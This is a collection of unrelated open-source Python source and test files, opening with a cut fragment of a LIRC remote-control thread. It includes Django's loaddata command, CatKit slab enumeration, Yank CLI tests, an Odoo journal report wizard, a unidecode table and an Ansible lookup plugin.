code = lirc.nextcode() # list; empty if no buttons pressed
except lirc.NextCodeError:
_LOGGER.warning("Error reading next code from LIRC")
code = None
# interpret result from python-lirc
if code:
code = code[0]
_LOGGER.info("Got new LIRC code %s", code)
self.hass.bus.fire(EVENT_IR_COMMAND_RECEIVED, {BUTTON_NAME: code})
else:
time.sleep(0.2)
lirc.deinit()
_LOGGER.debug("LIRC interface thread stopped")
|
Work4Labs/lettuce
|
refs/heads/master
|
tests/integration/lib/Django-1.2.5/django/core/management/commands/loaddata.py
|
44
|
import sys
import os
import gzip
import zipfile
from optparse import make_option
from django.conf import settings
from django.core import serializers
from django.core.management.base import BaseCommand
from django.core.management.color import no_style
from django.db import connections, router, transaction, DEFAULT_DB_ALIAS
from django.db.models import get_apps
from django.utils.itercompat import product
try:
import bz2
has_bz2 = True
except ImportError:
has_bz2 = False
class Command(BaseCommand):
help = 'Installs the named fixture(s) in the database.'
args = "fixture [fixture ...]"
option_list = BaseCommand.option_list + (
make_option('--database', action='store', dest='database',
default=DEFAULT_DB_ALIAS, help='Nominates a specific database to load '
'fixtures into. Defaults to the "default" database.'),
)
def handle(self, *fixture_labels, **options):
using = options.get('database', DEFAULT_DB_ALIAS)
connection = connections[using]
self.style = no_style()
verbosity = int(options.get('verbosity', 1))
show_traceback = options.get('traceback', False)
# commit is a stealth option - it isn't really useful as
# a command line option, but it can be useful when invoking
# loaddata from within another script.
# If commit=True, loaddata will use its own transaction;
# if commit=False, the data load SQL will become part of
# the transaction in place when loaddata was invoked.
commit = options.get('commit', True)
# Keep a count of the installed objects and fixtures
fixture_count = 0
loaded_object_count = 0
fixture_object_count = 0
models = set()
humanize = lambda dirname: dirname and "'%s'" % dirname or 'absolute path'
# Get a cursor (even though we don't need one yet). This has
# the side effect of initializing the test database (if
# it isn't already initialized).
cursor = connection.cursor()
# Start transaction management. All fixtures are installed in a
# single transaction to ensure that all references are resolved.
if commit:
transaction.commit_unless_managed(using=using)
transaction.enter_transaction_management(using=using)
transaction.managed(True, using=using)
class SingleZipReader(zipfile.ZipFile):
def __init__(self, *args, **kwargs):
zipfile.ZipFile.__init__(self, *args, **kwargs)
if settings.DEBUG:
assert len(self.namelist()) == 1, "Zip-compressed fixtures must contain only one file."
def read(self):
return zipfile.ZipFile.read(self, self.namelist()[0])
compression_types = {
None: file,
'gz': gzip.GzipFile,
'zip': SingleZipReader
}
if has_bz2:
compression_types['bz2'] = bz2.BZ2File
app_module_paths = []
for app in get_apps():
if hasattr(app, '__path__'):
# It's a 'models/' subpackage
for path in app.__path__:
app_module_paths.append(path)
else:
# It's a models.py module
app_module_paths.append(app.__file__)
app_fixtures = [os.path.join(os.path.dirname(path), 'fixtures') for path in app_module_paths]
for fixture_label in fixture_labels:
parts = fixture_label.split('.')
if len(parts) > 1 and parts[-1] in compression_types:
compression_formats = [parts[-1]]
parts = parts[:-1]
else:
compression_formats = compression_types.keys()
if len(parts) == 1:
fixture_name = parts[0]
formats = serializers.get_public_serializer_formats()
else:
fixture_name, format = '.'.join(parts[:-1]), parts[-1]
if format in serializers.get_public_serializer_formats():
formats = [format]
else:
formats = []
if formats:
if verbosity > 1:
self.stdout.write("Loading '%s' fixtures...\n" % fixture_name)
else:
self.stderr.write(
self.style.ERROR("Problem installing fixture '%s': %s is not a known serialization format.\n" %
(fixture_name, format)))
if commit:
transaction.rollback(using=using)
transaction.leave_transaction_management(using=using)
return
if os.path.isabs(fixture_name):
fixture_dirs = [fixture_name]
else:
fixture_dirs = app_fixtures + list(settings.FIXTURE_DIRS) + ['']
for fixture_dir in fixture_dirs:
if verbosity > 1:
self.stdout.write("Checking %s for fixtures...\n" % humanize(fixture_dir))
label_found = False
for combo in product([using, None], formats, compression_formats):
database, format, compression_format = combo
file_name = '.'.join(
p for p in [
fixture_name, database, format, compression_format
]
if p
)
if verbosity > 1:
self.stdout.write("Trying %s for %s fixture '%s'...\n" % \
(humanize(fixture_dir), file_name, fixture_name))
full_path = os.path.join(fixture_dir, file_name)
open_method = compression_types[compression_format]
try:
fixture = open_method(full_path, 'r')
if label_found:
fixture.close()
self.stderr.write(self.style.ERROR("Multiple fixtures named '%s' in %s. Aborting.\n" %
(fixture_name, humanize(fixture_dir))))
if commit:
transaction.rollback(using=using)
transaction.leave_transaction_management(using=using)
return
else:
fixture_count += 1
objects_in_fixture = 0
loaded_objects_in_fixture = 0
if verbosity > 0:
self.stdout.write("Installing %s fixture '%s' from %s.\n" % \
(format, fixture_name, humanize(fixture_dir)))
try:
objects = serializers.deserialize(format, fixture, using=using)
for obj in objects:
objects_in_fixture += 1
if router.allow_syncdb(using, obj.object.__class__):
loaded_objects_in_fixture += 1
models.add(obj.object.__class__)
obj.save(using=using)
loaded_object_count += loaded_objects_in_fixture
fixture_object_count += objects_in_fixture
label_found = True
except (SystemExit, KeyboardInterrupt):
raise
except Exception:
import traceback
fixture.close()
if commit:
transaction.rollback(using=using)
transaction.leave_transaction_management(using=using)
if show_traceback:
traceback.print_exc()
else:
self.stderr.write(
self.style.ERROR("Problem installing fixture '%s': %s\n" %
(full_path, ''.join(traceback.format_exception(sys.exc_type,
sys.exc_value, sys.exc_traceback)))))
return
fixture.close()
# If the fixture we loaded contains 0 objects, assume that an
# error was encountered during fixture loading.
if objects_in_fixture == 0:
self.stderr.write(
self.style.ERROR("No fixture data found for '%s'. (File format may be invalid.)\n" %
(fixture_name)))
if commit:
transaction.rollback(using=using)
transaction.leave_transaction_management(using=using)
return
except Exception, e:
if verbosity > 1:
self.stdout.write("No %s fixture '%s' in %s.\n" % \
(format, fixture_name, humanize(fixture_dir)))
# If we found even one object in a fixture, we need to reset the
# database sequences.
if loaded_object_count > 0:
sequence_sql = connection.ops.sequence_reset_sql(self.style, models)
if sequence_sql:
if verbosity > 1:
self.stdout.write("Resetting sequences\n")
for line in sequence_sql:
cursor.execute(line)
if commit:
transaction.commit(using=using)
transaction.leave_transaction_management(using=using)
if fixture_object_count == 0:
if verbosity > 0:
self.stdout.write("No fixtures found.\n")
else:
if verbosity > 0:
if fixture_object_count == loaded_object_count:
self.stdout.write("Installed %d object(s) from %d fixture(s)\n" % (
loaded_object_count, fixture_count))
else:
self.stdout.write("Installed %d object(s) (of %d) from %d fixture(s)\n" % (
loaded_object_count, fixture_object_count, fixture_count))
# Close the DB connection. This is required as a workaround for an
# edge case in MySQL: if the same connection is used to
# create tables, load data, and query, the query can return
# incorrect results. See Django #7572, MySQL #37735.
if commit:
connection.close()
|
jboes/CatKit
|
refs/heads/master
|
catkit/enumeration.py
|
1
|
from .gen.surface import get_unique_indices, SlabGenerator
from .gen.symmetry import get_standardized_cell
import numpy as np
def surfaces(
bulk,
width,
miller_indices=(1, 1, 1),
terminations=None,
sizes=None,
vacuum=10,
fixed=0,
layer_type='angs',
**kwargs):
"""Return a list of enumerated surfaces based on symmetry properties of
interest to the user. Any bulk structure provided will be standardized.
This function will take additional keyword arguments for the
:meth:`catkit.gen.surface.SlabGenerator` Class.
Parameters
----------
bulk : str | Atoms
The atomic symbol to be passed to the as bulk builder function
or an atoms object representing the bulk structure to use.
width : float
Minimum width of the slab in angstroms before trimming. Imposing
symmetry requirements will reduce the width.
miller_indices : int | list (3,) | list of list (n, 3)
List of the miller indices to enumerate slabs for. If an integer is
provided, the value is treated as the maximum miller index to consider
for an enumeration of all possible unique miller indices.
terminations : int | array_like
Return the terminations associated with the provided indices. If -1,
all possible terminations are enumerated.
sizes : None | int | array_like (n,)
Enumerate all surface sizes in the provided list. Sizes are integers
which represent multiples of the smallest possible surface area.
If None, return slabs with the smallest possible surface area. If an
integer, enumerate all sizes up to that multiple.
vacuum : float
Angstroms of vacuum to add to the unit cell.
fixed : int
Number of layers to constrain.
layer_type : 'angs' | 'trim' | 'stoich' | 'sym'
Method of slab layering to perform. See also:
:meth:`catkit.gen.surface.SlabGenerator`
Returns
-------
slabs : list of Gratoms objects
Return a list of enumerated slab structures.
"""
standardized_bulk = get_standardized_cell(bulk, tol=5e-3)
if isinstance(miller_indices, int):
miller_indices = get_unique_indices(
standardized_bulk, miller_indices)
elif isinstance(miller_indices, (list, np.ndarray)):
miller_indices = np.atleast_2d(miller_indices)
if sizes is None:
sizes = np.ones(1)
elif isinstance(sizes, int):
sizes = np.arange(sizes)
slabs = []
for miller in miller_indices:
generator = SlabGenerator(
bulk=standardized_bulk,
miller_index=miller,
layers=width,
vacuum=vacuum,
fixed=fixed,
layer_type=layer_type,
**kwargs)
if terminations is None:
iterms = np.zeros(1)
elif terminations == -1:
zshifts = generator.get_unique_terminations()
iterms = np.arange(len(zshifts))
else:
iterms = terminations
for i in iterms:
for size in sizes:
slab = generator.get_slab(size=int(size), iterm=i)
slab.info['miller'] = miller
slabs += [slab]
return slabs
|
crasker/scrapy
|
refs/heads/master
|
scrapy/core/__init__.py
|
216
|
"""
Scrapy core library classes and functions.
"""
|
luzheqi1987/nova-annotation
|
refs/heads/master
|
nova/openstack/common/report/views/__init__.py
|
82
|
# Copyright 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Provides predefined views
This module provides a collection of predefined views
for use in reports. It is separated by type (xml, json, or text).
Each type contains a submodule called 'generic' containing
several basic, universal views for that type. There is also
a predefined view that utilizes Jinja.
"""
|
choderalab/yank
|
refs/heads/master
|
Yank/tests/test_cli.py
|
1
|
#!/usr/bin/python
# =============================================================================================
# MODULE DOCSTRING
# =============================================================================================
"""
Test command-line interface.
"""
# =============================================================================================
# GLOBAL IMPORTS
# =============================================================================================
import os
import textwrap
import subprocess
import openmmtools as mmtools
from yank import utils
# =============================================================================================
# UNIT TESTS
# =============================================================================================
def run_cli(arguments, expected_output=None):
"""Generic helper to run command line arguments"""
# cli.main(argv=arguments.split())
command = 'yank ' + arguments
[stoutdata, sterrdata] = subprocess.Popen(command.split()).communicate()
# TODO: Interprety suprocess data better
if sterrdata:
message = "An error return value (%s) was obtained:\n" % str(sterrdata)
message += "\n"
message += stoutdata
message += "\n"
raise Exception(message)
if expected_output:
if stoutdata != expected_output:
message = "Output differs from expected output.\n"
message += "\n"
message += "Expected output:\n"
message += expected_output
message += "\n"
message += "Actual output:\n"
message += stoutdata
message += "\n"
raise Exception(message)
def test_help():
"""Test that the help command works"""
run_cli('--help')
def test_cite():
"""Test that the cite command works"""
run_cli('--cite')
def test_selftest():
"""Test that the selftest command works"""
try:
run_cli('selftest')
except ImportError as e:
# Trap the libOpenCl error
if "libOpenCL.so" in e.message:
print("Failed to load OpenCL. If this is an expected result, carry on, if not, please debug!")
else:
raise e
def test_script_yaml():
"""Check that yank script --yaml command works."""
setup_dir = utils.get_data_filename(os.path.join('tests', 'data', 'p-xylene-implicit'))
pxylene_path = os.path.join(setup_dir, 'p-xylene.mol2')
lysozyme_path = os.path.join(setup_dir, '181L-pdbfixer.pdb')
yaml_content = """
---
options:
default_number_of_iterations: 0
output_dir: '.'
resume_setup: yes
resume_simulation: no
minimize: no
molecules:
T4lysozyme:
filepath: {}
p-xylene:
filepath: {}
antechamber:
charge_method: bcc
solvents:
vacuum:
nonbonded_method: NoCutoff
protocols:
absolute-binding:
complex:
alchemical_path:
lambda_electrostatics: [1.0, 0.5, 0.0]
lambda_sterics: [1.0, 0.5, 0.0]
solvent:
alchemical_path:
lambda_electrostatics: [1.0, 0.5, 0.0]
lambda_sterics: [1.0, 0.5, 0.0]
systems:
system:
receptor: T4lysozyme
ligand: p-xylene
solvent: vacuum
leap:
parameters: [leaprc.gaff, oldff/leaprc.ff14SB]
experiments:
system: system
protocol: absolute-binding
restraint:
type: FlatBottom
""".format(lysozyme_path, pxylene_path)
with mmtools.utils.temporary_directory() as tmp_dir:
yaml_file_path = os.path.join(tmp_dir, 'yank.yaml')
with open(yaml_file_path, 'w') as f:
f.write(textwrap.dedent(yaml_content))
run_cli('script --yaml={}'.format(yaml_file_path))
# Test option overriding.
run_cli('script --yaml={} -o options:resume_simulation:yes'.format(yaml_file_path))
def test_script_yaml_status():
"""Check that 'yank script --yaml --status' works."""
host_path = mmtools.testsystems.get_data_filename('data/cb7-b2/cb7_am1-bcc.mol2')
guest_path = mmtools.testsystems.get_data_filename('data/cb7-b2/b2_am1-bcc.mol2')
yaml_content = """\
---
options:
output_dir: 'output'
resume_setup: yes
resume_simulation: no
minimize: no
verbose: no
switch_experiment_interval: 20
molecules:
host:
filepath: {}
antechamber:
charge_method: null
guest:
filepath: {}
antechamber:
charge_method: null
mcmc_moves:
langevin:
type: LangevinSplittingDynamicsMove
timestep: 4.0*femtosecond
collision_rate: 1.0/picosecond
reassign_velocities: yes
splitting: 'V R O R V'
n_steps: 10
n_restart_attempts: 4
samplers:
repex:
type: ReplicaExchangeSampler
mcmc_moves: langevin
number_of_iterations: 40
solvents:
vacuum:
nonbonded_method: NoCutoff
protocols:
absolute-binding:
complex:
alchemical_path:
lambda_restraints: [0.0, 1.0]
lambda_electrostatics: [1.0, 0.0]
lambda_sterics: [1.0, 0.0]
solvent:
alchemical_path:
lambda_electrostatics: [1.0, 0.0]
lambda_sterics: [1.0, 0.0]
systems:
system:
receptor: host
ligand: guest
solvent: vacuum
leap:
parameters: [leaprc.gaff, oldff/leaprc.ff14SB]
experiments:
system: system
sampler: repex
protocol: absolute-binding
restraint:
type: Harmonic
""".format(host_path, guest_path)
with mmtools.utils.temporary_directory() as tmp_dir:
yaml_file_path = os.path.join(tmp_dir, 'yank.yaml')
with open(yaml_file_path, 'w') as f:
f.write(textwrap.dedent(yaml_content))
# Test status output.
run_cli('script --yaml={} --status'.format(yaml_file_path))
# Ensure pickle file is found
output_path = os.path.join(tmp_dir, 'output', 'experiments')
filenames = os.listdir(output_path)
if 'status.pkl' not in filenames:
msg = 'Status file not found in experiment directory\n'
msg += 'contents: {}'.format(filenames)
raise Exception(msg)
|
lepistone/odoo
|
refs/heads/master
|
addons/account/wizard/account_report_print_journal.py
|
378
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from lxml import etree
class account_print_journal(osv.osv_memory):
_inherit = "account.common.journal.report"
_name = 'account.print.journal'
_description = 'Account Print Journal'
_columns = {
'sort_selection': fields.selection([('l.date', 'Date'),
('am.name', 'Journal Entry Number'),],
'Entries Sorted by', required=True),
'journal_ids': fields.many2many('account.journal', 'account_print_journal_journal_rel', 'account_id', 'journal_id', 'Journals', required=True),
}
_defaults = {
'sort_selection': 'am.name',
'filter': 'filter_period',
'journal_ids': False,
}
def fields_view_get(self, cr, uid, view_id=None, view_type='form', context=None, toolbar=False, submenu=False):
'''
used to set the domain on 'journal_ids' field: we exclude or only propose the journals of type
sale/purchase (+refund) accordingly to the presence of the key 'sale_purchase_only' in the context.
'''
if context is None:
context = {}
res = super(account_print_journal, self).fields_view_get(cr, uid, view_id=view_id, view_type=view_type, context=context, toolbar=toolbar, submenu=submenu)
doc = etree.XML(res['arch'])
if context.get('sale_purchase_only'):
domain ="[('type', 'in', ('sale','purchase','sale_refund','purchase_refund'))]"
else:
domain ="[('type', 'not in', ('sale','purchase','sale_refund','purchase_refund'))]"
nodes = doc.xpath("//field[@name='journal_ids']")
for node in nodes:
node.set('domain', domain)
res['arch'] = etree.tostring(doc)
return res
def _print_report(self, cr, uid, ids, data, context=None):
if context is None:
context = {}
data = self.pre_print_report(cr, uid, ids, data, context=context)
data['form'].update(self.read(cr, uid, ids, ['sort_selection'], context=context)[0])
if context.get('sale_purchase_only'):
return self.pool['report'].get_action(cr, uid, [], 'account.report_salepurchasejournal', data=data, context=context)
else:
return self.pool['report'].get_action(cr, uid, [], 'account.report_journal', data=data, context=context)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
ol-loginov/intellij-community
|
refs/heads/master
|
python/testData/mover/continueBreak.py
|
83
|
test()
for item in range(10):
co<caret>ntinue
test1()
|
duyetdev/openerp-6.1.1
|
refs/heads/master
|
openerp/test/test_translate.py
|
460
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2010 OpenERP S.A. http://www.openerp.com
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import unittest
from openerp.tools.translate import quote, unquote
class TranslationToolsTestCase(unittest.TestCase):
def test_quote_unquote(self):
def test_string(str):
quoted = quote(str)
#print "\n1:", repr(str)
#print "2:", repr(quoted)
unquoted = unquote("".join(quoted.split('"\n"')))
#print "3:", repr(unquoted)
self.assertEquals(str, unquoted)
test_string("""test \nall kinds\n \n o\r
\\\\ nope\n\n"
""")
# The ones with 1+ backslashes directly followed by
# a newline or literal N can fail... we would need a
# state-machine parser to handle these, but this would
# be much slower so it's better to avoid them at the moment
self.assertRaises(AssertionError, quote, """test \nall kinds\n\no\r
\\\\nope\n\n"
""")
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
cherokee/webserver
|
refs/heads/master
|
qa/239-utf8-file1.py
|
8
|
# -*- coding: utf-8 -*-
from base import *
DIR = "utf8file1"
FILENAME = "¡ĤĒĹĻŎ!"
MAGIC = "So, Cherokee does support UTF8"
class Test (TestBase):
def __init__ (self):
TestBase.__init__ (self, __file__)
self.name = "UTF8 file download"
self.request = "GET /%s/%s HTTP/1.0\r\n" %(DIR, FILENAME)
self.expected_error = 200
self.expected_content = MAGIC
def Prepare (self, www):
d = self.Mkdir (www, DIR)
f = self.WriteFile (d, FILENAME, 0644, MAGIC)
|
guijomatos/SickRage
|
refs/heads/master
|
lib/unidecode/x010.py
|
252
|
data = (
'k', # 0x00
'kh', # 0x01
'g', # 0x02
'gh', # 0x03
'ng', # 0x04
'c', # 0x05
'ch', # 0x06
'j', # 0x07
'jh', # 0x08
'ny', # 0x09
'nny', # 0x0a
'tt', # 0x0b
'tth', # 0x0c
'dd', # 0x0d
'ddh', # 0x0e
'nn', # 0x0f
'tt', # 0x10
'th', # 0x11
'd', # 0x12
'dh', # 0x13
'n', # 0x14
'p', # 0x15
'ph', # 0x16
'b', # 0x17
'bh', # 0x18
'm', # 0x19
'y', # 0x1a
'r', # 0x1b
'l', # 0x1c
'w', # 0x1d
's', # 0x1e
'h', # 0x1f
'll', # 0x20
'a', # 0x21
'[?]', # 0x22
'i', # 0x23
'ii', # 0x24
'u', # 0x25
'uu', # 0x26
'e', # 0x27
'[?]', # 0x28
'o', # 0x29
'au', # 0x2a
'[?]', # 0x2b
'aa', # 0x2c
'i', # 0x2d
'ii', # 0x2e
'u', # 0x2f
'uu', # 0x30
'e', # 0x31
'ai', # 0x32
'[?]', # 0x33
'[?]', # 0x34
'[?]', # 0x35
'N', # 0x36
'\'', # 0x37
':', # 0x38
'', # 0x39
'[?]', # 0x3a
'[?]', # 0x3b
'[?]', # 0x3c
'[?]', # 0x3d
'[?]', # 0x3e
'[?]', # 0x3f
'0', # 0x40
'1', # 0x41
'2', # 0x42
'3', # 0x43
'4', # 0x44
'5', # 0x45
'6', # 0x46
'7', # 0x47
'8', # 0x48
'9', # 0x49
' / ', # 0x4a
' // ', # 0x4b
'n*', # 0x4c
'r*', # 0x4d
'l*', # 0x4e
'e*', # 0x4f
'sh', # 0x50
'ss', # 0x51
'R', # 0x52
'RR', # 0x53
'L', # 0x54
'LL', # 0x55
'R', # 0x56
'RR', # 0x57
'L', # 0x58
'LL', # 0x59
'[?]', # 0x5a
'[?]', # 0x5b
'[?]', # 0x5c
'[?]', # 0x5d
'[?]', # 0x5e
'[?]', # 0x5f
'[?]', # 0x60
'[?]', # 0x61
'[?]', # 0x62
'[?]', # 0x63
'[?]', # 0x64
'[?]', # 0x65
'[?]', # 0x66
'[?]', # 0x67
'[?]', # 0x68
'[?]', # 0x69
'[?]', # 0x6a
'[?]', # 0x6b
'[?]', # 0x6c
'[?]', # 0x6d
'[?]', # 0x6e
'[?]', # 0x6f
'[?]', # 0x70
'[?]', # 0x71
'[?]', # 0x72
'[?]', # 0x73
'[?]', # 0x74
'[?]', # 0x75
'[?]', # 0x76
'[?]', # 0x77
'[?]', # 0x78
'[?]', # 0x79
'[?]', # 0x7a
'[?]', # 0x7b
'[?]', # 0x7c
'[?]', # 0x7d
'[?]', # 0x7e
'[?]', # 0x7f
'[?]', # 0x80
'[?]', # 0x81
'[?]', # 0x82
'[?]', # 0x83
'[?]', # 0x84
'[?]', # 0x85
'[?]', # 0x86
'[?]', # 0x87
'[?]', # 0x88
'[?]', # 0x89
'[?]', # 0x8a
'[?]', # 0x8b
'[?]', # 0x8c
'[?]', # 0x8d
'[?]', # 0x8e
'[?]', # 0x8f
'[?]', # 0x90
'[?]', # 0x91
'[?]', # 0x92
'[?]', # 0x93
'[?]', # 0x94
'[?]', # 0x95
'[?]', # 0x96
'[?]', # 0x97
'[?]', # 0x98
'[?]', # 0x99
'[?]', # 0x9a
'[?]', # 0x9b
'[?]', # 0x9c
'[?]', # 0x9d
'[?]', # 0x9e
'[?]', # 0x9f
'A', # 0xa0
'B', # 0xa1
'G', # 0xa2
'D', # 0xa3
'E', # 0xa4
'V', # 0xa5
'Z', # 0xa6
'T`', # 0xa7
'I', # 0xa8
'K', # 0xa9
'L', # 0xaa
'M', # 0xab
'N', # 0xac
'O', # 0xad
'P', # 0xae
'Zh', # 0xaf
'R', # 0xb0
'S', # 0xb1
'T', # 0xb2
'U', # 0xb3
'P`', # 0xb4
'K`', # 0xb5
'G\'', # 0xb6
'Q', # 0xb7
'Sh', # 0xb8
'Ch`', # 0xb9
'C`', # 0xba
'Z\'', # 0xbb
'C', # 0xbc
'Ch', # 0xbd
'X', # 0xbe
'J', # 0xbf
'H', # 0xc0
'E', # 0xc1
'Y', # 0xc2
'W', # 0xc3
'Xh', # 0xc4
'OE', # 0xc5
'[?]', # 0xc6
'[?]', # 0xc7
'[?]', # 0xc8
'[?]', # 0xc9
'[?]', # 0xca
'[?]', # 0xcb
'[?]', # 0xcc
'[?]', # 0xcd
'[?]', # 0xce
'[?]', # 0xcf
'a', # 0xd0
'b', # 0xd1
'g', # 0xd2
'd', # 0xd3
'e', # 0xd4
'v', # 0xd5
'z', # 0xd6
't`', # 0xd7
'i', # 0xd8
'k', # 0xd9
'l', # 0xda
'm', # 0xdb
'n', # 0xdc
'o', # 0xdd
'p', # 0xde
'zh', # 0xdf
'r', # 0xe0
's', # 0xe1
't', # 0xe2
'u', # 0xe3
'p`', # 0xe4
'k`', # 0xe5
'g\'', # 0xe6
'q', # 0xe7
'sh', # 0xe8
'ch`', # 0xe9
'c`', # 0xea
'z\'', # 0xeb
'c', # 0xec
'ch', # 0xed
'x', # 0xee
'j', # 0xef
'h', # 0xf0
'e', # 0xf1
'y', # 0xf2
'w', # 0xf3
'xh', # 0xf4
'oe', # 0xf5
'f', # 0xf6
'[?]', # 0xf7
'[?]', # 0xf8
'[?]', # 0xf9
'[?]', # 0xfa
' // ', # 0xfb
'[?]', # 0xfc
'[?]', # 0xfd
'[?]', # 0xfe
)
|
veger/ansible
|
refs/heads/devel
|
lib/ansible/plugins/lookup/together.py
|
100
|
# (c) 2013, Bradley Young <young.bradley@gmail.com>
# (c) 2012-17 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = """
lookup: together
author: Bradley Young <young.bradley@gmail.com>
version_added: '1.3'
short_description: merges lists into synchronized list
description:
- Creates a list with the iterated elements of the supplied lists
- "To clarify with an example, [ 'a', 'b' ] and [ 1, 2 ] turn into [ ('a',1), ('b', 2) ]"
- This is basically the same as the 'zip_longest' filter and Python function
- Any 'unbalanced' elements will be substituted with 'None'
options:
_terms:
description: list of lists to merge
required: True
"""
EXAMPLES = """
- name: item.0 returns from the 'a' list, item.1 returns from the '1' list
debug:
msg: "{{ item.0 }} and {{ item.1 }}"
with_together:
- ['a', 'b', 'c', 'd']
- [1, 2, 3, 4]
"""
RETURN = """
_list:
description: synchronized list
"""
from ansible.errors import AnsibleError
from ansible.module_utils.six.moves import zip_longest
from ansible.plugins.lookup import LookupBase
from ansible.utils.listify import listify_lookup_plugin_terms
class LookupModule(LookupBase):
"""
Transpose a list of arrays:
[1, 2, 3], [4, 5, 6] -> [1, 4], [2, 5], [3, 6]
Replace any empty spots in 2nd array with None:
[1, 2], [3] -> [1, 3], [2, None]
"""
def _lookup_variables(self, terms):
results = []
for x in terms:
intermediate = listify_lookup_plugin_terms(x, templar=self._templar, loader=self._loader)
results.append(intermediate)
return results
def run(self, terms, variables=None, **kwargs):
terms = self._lookup_variables(terms)
my_list = terms[:]
if len(my_list) == 0:
raise AnsibleError("with_together requires at least one element in each list")
return [self._flatten(x) for x in zip_longest(*my_list, fillvalue=None)]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.